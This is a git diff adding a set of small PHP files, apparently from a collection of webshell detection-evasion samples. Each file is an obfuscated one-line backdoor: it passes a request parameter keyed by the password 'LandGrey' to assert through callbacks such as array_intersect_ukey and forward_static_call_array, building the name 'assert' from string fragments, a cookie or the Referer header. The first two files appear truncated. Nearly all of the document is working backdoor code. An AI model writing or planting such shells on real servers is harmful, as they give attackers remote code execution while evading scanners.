diff --git a/php/array_intersect_uassoc-filename-last-char-must-be-r.php b/php/array_intersect_uassoc-filename-last-char-must-be-r.php new file mode 100644 index 0000000..105091a --- /dev/null +++ b/php/array_intersect_uassoc-filename-last-char-must-be-r.php @@ -0,0 +1,7 @@ + ""), array(1), $f); +?> diff --git a/php/array_intersect_uassoc-headers-accept-r.php b/php/array_intersect_uassoc-headers-accept-r.php new file mode 100644 index 0000000..16eaa84 --- /dev/null +++ b/php/array_intersect_uassoc-headers-accept-r.php @@ -0,0 +1,7 @@ + ""), array(1), $f); +?> diff --git a/php/array_intersect_ukey-cookie-ass.php b/php/array_intersect_ukey-cookie-ass.php new file mode 100644 index 0000000..bdeccb6 --- /dev/null +++ b/php/array_intersect_ukey-cookie-ass.php @@ -0,0 +1,9 @@ += 5.4.0, PHP 7) + * + */ +$password = "LandGrey"; +$ch = $_COOKIE["set-domain-name"]; +array_intersect_ukey(array($_REQUEST[$password] => 1), array(1), $ch."ert"); +?> diff --git a/php/array_intersect_ukey.php b/php/array_intersect_ukey.php new file mode 100644 index 0000000..552636f --- /dev/null +++ b/php/array_intersect_ukey.php @@ -0,0 +1,9 @@ += 5.4.0, PHP 7) + * + */ +$password = "LandGrey"; +$ch = explode(".","hello.ass.world.er.t"); +array_intersect_ukey(array($_REQUEST[$password] => 1), array(1), $ch[1].$ch[3].$ch[4]); +?> diff --git a/php/array_udiff_assoc.php b/php/array_udiff_assoc.php new file mode 100644 index 0000000..76c9c77 --- /dev/null +++ b/php/array_udiff_assoc.php @@ -0,0 +1,8 @@ += 5.4.0, PHP 7) +* +*/ +$password = "LandGrey"; +array_udiff_assoc(array($_REQUEST[$password]), array(1), "assert"); +?> diff --git a/php/forward_static_call_array-referer-ass.php b/php/forward_static_call_array-referer-ass.php new file mode 100644 index 0000000..22faf02 --- /dev/null +++ b/php/forward_static_call_array-referer-ass.php @@ -0,0 +1,9 @@ += 5.3.0, PHP 7) + * + */ +$password = "LandGrey"; +$wx = substr($_SERVER["HTTP_REFERER"],-7,-4); +forward_static_call_array($wx."ert", array($_REQUEST[$password])); +?>